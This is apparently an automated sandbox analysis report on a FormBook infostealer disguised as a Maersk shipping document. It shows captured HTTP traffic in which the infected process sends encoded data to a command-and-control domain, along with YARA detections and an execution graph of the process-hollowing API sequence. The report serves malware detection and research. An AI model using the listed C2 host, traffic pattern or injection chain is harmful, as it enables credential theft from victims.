                                                  Data Raw: 6a 48 6d 34 47 58 72 3d 72 34 72 4b 63 69 62 56 53 78 34 76 54 67 42 5a 4e 7a 70 61 4b 49 4c 73 56 68 4e 47 72 4d 2b 4b 2f 50 4c 7a 76 71 49 4e 41 78 30 75 4f 5a 69 34 4e 45 44 68 48 33 70 6e 6e 71 33 57 69 76 54 36 49 4d 30 6b 56 45 77 39 72 68 39 34 63 74 31 7a 56 53 72 69 65 33 2b 45 71 56 4f 2b 38 4f 55 63 32 63 69 75 58 72 4a 34 61 52 2f 59 77 62 34 49 78 59 39 2b 4d 4f 32 72 51 43 71 55 62 42 74 63 64 76 33 30 38 55 7a 68 55 54 2b 56 36 4d 77 37 65 70 49 62 7a 30 79 32 39 48 76 74 49 66 38 2f 6f 33 53 72 31 36 54 43 57 53 39 56 47 55 46 34 37 63 62 39 69 4f 63 48 4c 35 52 51 79 51 6c 44 77 48 74 48 53 73 56 4d 6f 47 74 6c 62 70 49 43 31 54 69 62 70 2f 49 3d
                                                  Data Ascii: jHm4GXr=r4rKcibVSx4vTgBZNzpaKILsVhNGrM+K/PLzvqINAx0uOZi4NEDhH3pnnq3WivT6IM0kVEw9rh94ct1zVSrie3+EqVO+8OUc2ciuXrJ4aR/Ywb4IxY9+MO2rQCqUbBtcdv308UzhUT+V6Mw7epIbz0y29HvtIf8/o3Sr16TCWS9VGUF47cb9iOcHL5RQyQlDwHtHSsVMoGtlbpIC1Tibp/I=


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.114996113.228.81.3980732C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 10, 2024 14:22:49.478758097 CET1866OUTPOST /y49d/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.taxiquynhonnew.click
                                                  Origin: http://www.taxiquynhonnew.click
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Content-Length: 1236
                                                  Cache-Control: max-age=0
                                                  Referer: http://www.taxiquynhonnew.click/y49d/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                  Data Raw: 6a 48 6d 34 47 58 72 3d 72 34 72 4b 63 69 62 56 53 78 34 76 54 67 42 5a 4e 7a 70 61 4b 49 4c 73 56 68 4e 47 72 4d 2b 4b 2f 50 4c 7a 76 71 49 4e 41 78 4d 75 50 71 61 34 4f 6c 44 68 47 33 70 6e 37 61 33 62 69 76 53 36 49 4d 74 74 56 45 73 44 72 6b 35 34 65 4c 70 7a 51 6a 72 69 56 33 2b 45 6f 56 4f 2f 6a 65 56 59 32 59 4f 51 58 72 5a 34 61 52 2f 59 77 64 38 49 33 4e 4a 2b 4f 4f 32 71 64 53 71 49 66 42 73 42 64 76 76 4f 38 56 48 75 55 6a 65 56 39 74 41 37 54 2f 63 62 70 30 79 30 74 58 75 74 49 66 77 67 6f 32 2f 61 31 36 33 6f 57 51 74 56 47 54 70 6a 68 49 65 2b 78 4e 6b 36 5a 2b 78 44 78 44 4a 66 2b 47 63 7a 54 65 30 7a 7a 78 41 31 51 62 45 4b 68 67 69 4c 71 36 6b 45 59 45 7a 63 72 34 37 53 70 76 79 41 30 4a 45 6e 71 4e 2f 6a 78 47 66 73 41 35 58 39 38 5a 51 75 4e 72 6f 4f 76 6d 37 31 45 50 4e 55 43 77 52 34 71 63 4a 74 4a 30 2f 69 37 68 34 32 46 43 42 4e 74 7a 54 63 78 2f 58 7a 70 70 79 72 76 4c 61 66 74 65 59 65 70 69 6a 50 65 68 36 39 53 66 75 36 6d 42 6e 37 43 34 70 58 73 54 79 74 50 4f 70 78 57 36 [TRUNCATED]
                                                  Data Ascii: jHm4GXr=r4rKcibVSx4vTgBZNzpaKILsVhNGrM+K/PLzvqINAxMuPqa4OlDhG3pn7a3bivS6IMttVEsDrk54eLpzQjriV3+EoVO/jeVY2YOQXrZ4aR/Ywd8I3NJ+OO2qdSqIfBsBdvvO8VHuUjeV9tA7T/cbp0y0tXutIfwgo2/a163oWQtVGTpjhIe+xNk6Z+xDxDJf+GczTe0zzxA1QbEKhgiLq6kEYEzcr47SpvyA0JEnqN/jxGfsA5X98ZQuNroOvm71EPNUCwR4qcJtJ0/i7h42FCBNtzTcx/XzppyrvLafteYepijPeh69Sfu6mBn7C4pXsTytPOpxW6Jzog6zWptYDL6Bet4o4SVbmbjWnX2CTlHtQ0cFCwzG0/2OMg8MsyWFJ+mIQa3VWwWIJ2Yv1GqCI5IVsd7A/Mhe4G3oKP0SNpX0STRXQWHOCxEsTRpDhrXVt2SDez3AZRG5xA64kfbllKGGAlO08cUJI9Yq55G15G3O7BEZjgq7H230ed7n9IMUhA8xqeDZIXli0HGvI02l4QBk+rdarTE33qkNlmVGLv3e51FFbNuVOBbp1X8IB5l4S5mD0P+n5MHbd93PbEfPFPd9vgy7fVD3FQXpfIEhZn/TuMMYcxXrFFbfUPpZqpSIKnQPUSCS6DTGjCQjJTZ+BXFobD6gzd1bik/ND97MC1v8YGDiiagH0CB3Z+L8+uNJZR+LkWxVNwgtUv6hisvK3NviBLo+4OOhjtir/BgoAjBO5VlPShB7g/LrCSSsMArs/wnTqnaF6+omtoHpPVr6iO7KENJvziN6epK7WgYyrBUJd2amINILbUYRHgg+TJhfZzbbwY6brGcmS7HGntDsp3frgReBLj+Iqh82MUP0kRITwWXfla7tKj5y6R9YlIoErd9/k/bWBWt9ll2v5MhMwOPlH2T4tgPxfJ8Hyn/r6RXfbesB0HrFaJEhUTKx2hffCzZ18KKLbaqL72xGjqqN0mQ5cR+mggyQmmgRw4jih28j [TRUNCATED]
                                                  Dec 10, 2024 14:22:51.057413101 CET371INHTTP/1.1 301 Moved Permanently
                                                  Server: openresty
                                                  Date: Tue, 10 Dec 2024 13:22:50 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 166
                                                  Connection: close
                                                  Location: https://www.taxiquynhonnew.click/y49d/
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.114996913.228.81.3980732C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 10, 2024 14:22:52.133733988 CET552OUTGET /y49d/?jHm4GXr=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDyYrnyrhYUq4o7lYpBsWzTksb8l1Yx6Eo8=&2z=xX0xzrrpPjmP HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.9
                                                  Host: www.taxiquynhonnew.click
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                  Dec 10, 2024 14:22:53.708259106 CET516INHTTP/1.1 301 Moved Permanently
                                                  Server: openresty
                                                  Date: Tue, 10 Dec 2024 13:22:53 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 166
                                                  Connection: close
                                                  Location: https://www.taxiquynhonnew.click/y49d/?jHm4GXr=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDyYrnyrhYUq4o7lYpBsWzTksb8l1Yx6Eo8=&2z=xX0xzrrpPjmP
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:08:20:55
                                                  Start date:10/12/2024
                                                  Path:C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe"
                                                  Imagebase:0xec0000
                                                  File size:876'544 bytes
                                                  MD5 hash:1175234DABBEAB0E4A9EE04802EF57FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:3
                                                  Start time:08:20:59
                                                  Start date:10/12/2024
                                                  Path:C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\MAERSK LINE SHIPPING DOC_4253.exe"
                                                  Imagebase:0xc90000
                                                  File size:876'544 bytes
                                                  MD5 hash:1175234DABBEAB0E4A9EE04802EF57FA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1893908938.0000000001AC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1894488760.0000000001C80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:5
                                                  Start time:08:21:47
                                                  Start date:10/12/2024
                                                  Path:C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe"
                                                  Imagebase:0x20000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2537606826.0000000002280000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:6
                                                  Start time:08:21:49
                                                  Start date:10/12/2024
                                                  Path:C:\Windows\SysWOW64\tzutil.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\SysWOW64\tzutil.exe"
                                                  Imagebase:0xf50000
                                                  File size:48'640 bytes
                                                  MD5 hash:31DE852CCF7CED517CC79596C76126B4
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2536674826.0000000000E10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2536229023.0000000000960000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2536855237.0000000000E60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:moderate
                                                  Has exited:false

                                                  General

                                                  Target ID:9
                                                  Start time:08:22:02
                                                  Start date:10/12/2024
                                                  Path:C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe"
                                                  Imagebase:0x20000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2537167858.0000000001360000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:11
                                                  Start time:08:22:15
                                                  Start date:10/12/2024
                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                  Imagebase:0x7ff6de060000
                                                  File size:676'768 bytes
                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:9.7%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:187
                                                    Total number of Limit Nodes:10
                                                    execution_graph 51080 84aefc8 51082 84af016 DrawTextExW 51080->51082 51083 84af06e 51082->51083 51084 31bb218 51087 31bb300 51084->51087 51085 31bb227 51088 31bb344 51087->51088 51090 31bb321 51087->51090 51088->51085 51089 31bb548 GetModuleHandleW 51091 31bb575 51089->51091 51090->51088 51090->51089 51091->51085 51134 31bd7c8 DuplicateHandle 51135 31bd85e 51134->51135 51136 31b4668 51137 31b467a 51136->51137 51138 31b4686 51137->51138 51140 31b4778 51137->51140 51141 31b479d 51140->51141 51145 31b4878 51141->51145 51149 31b4888 51141->51149 51146 31b48af 51145->51146 51147 31b498c 51146->51147 51153 31b44b4 51146->51153 51150 31b48af 51149->51150 51151 31b498c 51150->51151 51152 31b44b4 CreateActCtxA 51150->51152 51152->51151 51154 31b5918 CreateActCtxA 51153->51154 51156 31b59db 51154->51156 51156->51156 51109 98fa348 51110 98fa35d 51109->51110 51112 98fa417 51110->51112 51115 84a2b38 51110->51115 51122 84a2b29 51110->51122 51111 98fa3ec 51116 84a2b5c 51115->51116 51117 84a2b63 51115->51117 51116->51111 51121 84a2b8a 51117->51121 51128 84a1f34 51117->51128 51120 84a1f34 GetCurrentThreadId 51120->51121 51121->51111 51123 84a2b38 51122->51123 51124 84a1f34 GetCurrentThreadId 51123->51124 51127 84a2b5c 51123->51127 51125 84a2b80 51124->51125 51126 84a1f34 GetCurrentThreadId 51125->51126 51126->51127 51127->51111 51129 84a1f3f 51128->51129 51130 84a2e9f GetCurrentThreadId 51129->51130 51131 84a2b80 51129->51131 51130->51131 51131->51120 51157 7fa6502 51161 7fa6b48 51157->51161 51179 7fa6b47 51157->51179 51158 7fa650c 51162 7fa6b62 51161->51162 51163 7fa6b6a 51162->51163 51197 7fa6fd1 51162->51197 51202 7fa7270 51162->51202 51207 7fa73d2 51162->51207 51212 7fa785e 51162->51212 51217 7fa72db 51162->51217 51225 7fa72a4 51162->51225 51230 7fa76e7 51162->51230 51235 7fa7366 51162->51235 51240 7fa708c 51162->51240 51245 7fa74cf 51162->51245 51249 7fa71ce 51162->51249 51253 7fa7549 51162->51253 51257 7fa7194 51162->51257 51265 7fa7617 51162->51265 51269 7fa7296 51162->51269 51163->51158 51180 7fa6b48 51179->51180 51181 7fa6b6a 51180->51181 51182 7fa72db 4 API calls 51180->51182 51183 7fa785e 2 API calls 51180->51183 51184 7fa73d2 2 API calls 51180->51184 51185 7fa7270 2 API calls 51180->51185 51186 7fa6fd1 2 API calls 51180->51186 51187 7fa7296 2 API calls 51180->51187 51188 7fa7617 2 API calls 51180->51188 51189 7fa7194 4 API calls 51180->51189 51190 7fa7549 2 API calls 51180->51190 51191 7fa71ce 2 API calls 51180->51191 51192 7fa74cf 2 API calls 51180->51192 51193 7fa708c 2 API calls 51180->51193 51194 7fa7366 2 API calls 51180->51194 51195 7fa76e7 2 API calls 51180->51195 51196 7fa72a4 2 API calls 51180->51196 51181->51158 51182->51181 51183->51181 51184->51181 51185->51181 51186->51181 51187->51181 51188->51181 51189->51181 51190->51181 51191->51181 51192->51181 51193->51181 51194->51181 51195->51181 51196->51181 51198 7fa6fdc 51197->51198 51274 7fa5cf8 51198->51274 51278 7fa5cec 51198->51278 51203 7fa78d2 51202->51203 51282 7fa5a68 51203->51282 51286 7fa5a70 51203->51286 51204 7fa78f9 51208 7fa73dc 51207->51208 51209 7fa76fc 51208->51209 51210 7fa5a68 WriteProcessMemory 51208->51210 51211 7fa5a70 WriteProcessMemory 51208->51211 51210->51208 51211->51208 51213 7fa7098 51212->51213 51214 7fa716d 51213->51214 51290 7fa5b60 51213->51290 51294 7fa5b58 51213->51294 51214->51163 51218 7fa7301 51217->51218 51298 7fa53e9 51218->51298 51302 7fa53f0 51218->51302 51219 7fa7098 51220 7fa716d 51219->51220 51223 7fa5b58 ReadProcessMemory 51219->51223 51224 7fa5b60 ReadProcessMemory 51219->51224 51220->51163 51223->51220 51224->51220 51226 7fa7a10 51225->51226 51306 7fa59a9 51226->51306 51310 7fa59b0 51226->51310 51227 7fa7a2e 51231 7fa76fc 51230->51231 51232 7fa73ed 51230->51232 51232->51230 51233 7fa5a68 WriteProcessMemory 51232->51233 51234 7fa5a70 WriteProcessMemory 51232->51234 51233->51232 51234->51232 51236 7fa7098 51235->51236 51236->51235 51237 7fa716d 51236->51237 51238 7fa5b58 ReadProcessMemory 51236->51238 51239 7fa5b60 ReadProcessMemory 51236->51239 51237->51163 51238->51237 51239->51237 51241 7fa7098 51240->51241 51242 7fa716d 51241->51242 51243 7fa5b58 ReadProcessMemory 51241->51243 51244 7fa5b60 ReadProcessMemory 51241->51244 51242->51163 51243->51242 51244->51242 51314 7fa54a0 51245->51314 51318 7fa5498 51245->51318 51246 7fa74ce 51246->51245 51251 7fa5b58 ReadProcessMemory 51249->51251 51252 7fa5b60 ReadProcessMemory 51249->51252 51250 7fa716d 51250->51163 51251->51250 51252->51250 51254 7fa74ce 51253->51254 51254->51253 51255 7fa5498 Wow64SetThreadContext 51254->51255 51256 7fa54a0 Wow64SetThreadContext 51254->51256 51255->51254 51256->51254 51258 7fa71a1 51257->51258 51263 7fa53e9 ResumeThread 51258->51263 51264 7fa53f0 ResumeThread 51258->51264 51259 7fa7098 51260 7fa716d 51259->51260 51261 7fa5b58 ReadProcessMemory 51259->51261 51262 7fa5b60 ReadProcessMemory 51259->51262 51260->51163 51261->51260 51262->51260 51263->51259 51264->51259 51267 7fa5a68 WriteProcessMemory 51265->51267 51268 7fa5a70 WriteProcessMemory 51265->51268 51266 7fa7648 51267->51266 51268->51266 51270 7fa7396 51269->51270 51272 7fa5498 Wow64SetThreadContext 51270->51272 51273 7fa54a0 Wow64SetThreadContext 51270->51273 51271 7fa73b1 51271->51163 51272->51271 51273->51271 51275 7fa5d81 51274->51275 51275->51275 51276 7fa5ee6 CreateProcessA 51275->51276 51277 7fa5f43 51276->51277 51279 7fa5cf8 CreateProcessA 51278->51279 51281 7fa5f43 51279->51281 51283 7fa5a6d WriteProcessMemory 51282->51283 51285 7fa5b0f 51283->51285 51285->51204 51287 7fa5ab8 WriteProcessMemory 51286->51287 51289 7fa5b0f 51287->51289 51289->51204 51291 7fa5bab ReadProcessMemory 51290->51291 51293 7fa5bef 51291->51293 51293->51214 51295 7fa5b60 ReadProcessMemory 51294->51295 51297 7fa5bef 51295->51297 51297->51214 51299 7fa53f0 ResumeThread 51298->51299 51301 7fa5461 51299->51301 51301->51219 51303 7fa5430 ResumeThread 51302->51303 51305 7fa5461 51303->51305 51305->51219 51307 7fa59b0 VirtualAllocEx 51306->51307 51309 7fa5a2d 51307->51309 51309->51227 51311 7fa59f0 VirtualAllocEx 51310->51311 51313 7fa5a2d 51311->51313 51313->51227 51315 7fa54e5 Wow64SetThreadContext 51314->51315 51317 7fa552d 51315->51317 51317->51246 51319 7fa54a0 Wow64SetThreadContext 51318->51319 51321 7fa552d 51319->51321 51321->51246 51102 7fa7ec0 51103 7fa804b 51102->51103 51104 7fa7ee6 51102->51104 51104->51103 51106 7fa25fc 51104->51106 51107 7fa8140 PostMessageW 51106->51107 51108 7fa81ac 51107->51108 51108->51104 51132 84ad480 CloseHandle 51133 84ad4e7 51132->51133 51092 31bd580 51093 31bd5c6 GetCurrentProcess 51092->51093 51095 31bd618 GetCurrentThread 51093->51095 51096 31bd611 51093->51096 51097 31bd64e 51095->51097 51098 31bd655 GetCurrentProcess 51095->51098 51096->51095 51097->51098 51101 31bd68b 51098->51101 51099 31bd6b3 GetCurrentThreadId 51100 31bd6e4 51099->51100 51101->51099

                                                    Executed Functions

                                                    Function 098F3668 Relevance: 7.0, Strings: 5, Instructions: 722COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351554773.00000000098F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_98f0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (o_q$(o_q$,cq$,cq$Hcq
                                                    • API String ID: 0-4110691418
                                                    • Opcode ID: 3ffe8c2a9773f21f3f045b2bdbf3c8fd99718ac834eda2a941a615487b52b902
                                                    • Instruction ID: ea97049b5db8b01bdf5f99b42712d643e16751b215c50f91a69a10a28b69f822
                                                    • Opcode Fuzzy Hash: 3ffe8c2a9773f21f3f045b2bdbf3c8fd99718ac834eda2a941a615487b52b902
                                                    • Instruction Fuzzy Hash: 9C526D35A00115DFCB18DF69D8A4A6DBBB2FF88390B15916EE906DB364DB31EC41CB90
                                                    Function 031B3E34 Relevance: 2.7, Strings: 2, Instructions: 196COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 697 31b3e34-31b6fc2 700 31b6fc9-31b7153 call 31b5c74 call 31b5c84 call 31b5c94 call 31b5ca4 call 31b01f8 * 4 697->700 701 31b6fc4 697->701 733 31b7160-31b7247 700->733 734 31b7155-31b715b 700->734 701->700 747 31b724f 733->747 735 31b7252-31b725f 734->735 747->735
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1336087492.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_31b0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `Ycl$t^cl
                                                    • API String ID: 0-2306952220
                                                    • Opcode ID: 43d8e0e2eeb48f350e0d9b5566af79f7ff66e054cc14f93296d5b85f1b1d8238
                                                    • Instruction ID: dc1bd6e78c63e6c3ba0c4f41aabc2ff10b43e5058c9e0db3e7d01b0a8fc5557b
                                                    • Opcode Fuzzy Hash: 43d8e0e2eeb48f350e0d9b5566af79f7ff66e054cc14f93296d5b85f1b1d8238
                                                    • Instruction Fuzzy Hash: 1281A274E00209DFDB08DFA9D994AEEBBB6FF88300F108529E419AB368DB355945CF51
                                                    Function 031B6F90 Relevance: 2.6, Strings: 2, Instructions: 142COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 866 31b6f90-31b6fc2 867 31b6fc9-31b701f call 31b5c74 call 31b5c84 866->867 868 31b6fc4 866->868 876 31b702a-31b704d call 31b5c94 call 31b5ca4 867->876 868->867 880 31b7052-31b7153 call 31b01f8 * 4 876->880 900 31b7160-31b722e 880->900 901 31b7155-31b715b 880->901 913 31b7238-31b7247 900->913 902 31b7252-31b725f 901->902 914 31b724f 913->914 914->902
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1336087492.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_31b0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `Ycl$t^cl
                                                    • API String ID: 0-2306952220
                                                    • Opcode ID: 360745e619b0eab6643bf03143afd6807b12ac75a3c1f796da34c7aaa18bad5f
                                                    • Instruction ID: c984dbca4563921c3bd1ada90be8def2ec6c28b5eb72d2bfa75cea6c7b271d1e
                                                    • Opcode Fuzzy Hash: 360745e619b0eab6643bf03143afd6807b12ac75a3c1f796da34c7aaa18bad5f
                                                    • Instruction Fuzzy Hash: 0951D474E012099FCB08DFA9D990AEEBBB2FF89300F14816AD415AB368DB345905CF90
                                                    Function 098F1240 Relevance: 1.9, Strings: 1, Instructions: 649COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 948 98f1240-98f1271 949 98f1278-98f133d 948->949 950 98f1273 948->950 956 98f138b-98f139c 949->956 950->949 957 98f133f-98f1377 956->957 958 98f139e-98f1406 956->958 961 98f137e-98f1388 957->961 962 98f1379 957->962 966 98f1c60-98f1c8b 958->966 961->956 962->961 968 98f1c8d-98f1cb6 966->968 969 98f1cb8-98f1cba 966->969 970 98f1cc0-98f1cd4 968->970 969->970 972 98f140b-98f1412 970->972 973 98f1cda-98f1ce1 970->973 974 98f1464-98f149f 972->974 976 98f14a5-98f14ae 974->976 977 98f1414-98f142a 974->977 978 98f14b1-98f14e5 976->978 979 98f142c 977->979 980 98f1431-98f144f 977->980 984 98f14e7-98f1501 978->984 985 98f1504-98f152b 978->985 979->980 981 98f1456-98f1461 980->981 982 98f1451 980->982 981->974 982->981 984->985 988 98f152d-98f1556 985->988 989 98f1558 985->989 990 98f1562-98f1570 988->990 989->990 991 98f1576-98f157d 990->991 992 98f1660-98f170d 990->992 994 98f1643-98f1654 991->994 1017 98f170f 992->1017 1018 98f1713-98f1715 992->1018 995 98f165a-98f165b 994->995 996 98f1582-98f1598 994->996 1000 98f1c07-98f1c42 995->1000 998 98f159f-98f15fd 996->998 999 98f159a 996->999 1011 98f15ff 998->1011 1012 98f1604-98f1629 998->1012 999->998 1000->978 1004 98f1c48-98f1c5f 1000->1004 1004->966 1011->1012 1015 98f163f-98f1640 1012->1015 1016 98f162b-98f1637 1012->1016 1015->994 1016->1015 1019 98f1717 1017->1019 1020 98f1711 1017->1020 1021 98f171c-98f1723 1018->1021 1019->1021 1020->1018 1022 98f1725-98f172e 1021->1022 1023 98f1731-98f1762 1021->1023 1022->1023 1025 98f17b5-98f17f0 1023->1025 1027 98f17f6-98f1809 1025->1027 1028 98f1764-98f1779 1025->1028 1034 98f180b-98f19b2 1027->1034 1035 98f1811-98f1831 1027->1035 1030 98f177b 1028->1030 1031 98f1780-98f179e 1028->1031 1030->1031 1032 98f17a5-98f17b2 1031->1032 1033 98f17a0 1031->1033 1032->1025 1033->1032 1038 98f19ba-98f1a59 1034->1038 1039 98f19b4-98f19b5 1034->1039 1041 98f183a-98f18fd 1035->1041 1059 98f1a5b 1038->1059 1060 98f1a60-98f1a92 1038->1060 1040 98f1bc2-98f1bef 1039->1040 1045 98f1c06 1040->1045 1046 98f1bf1-98f1c05 1040->1046 1057 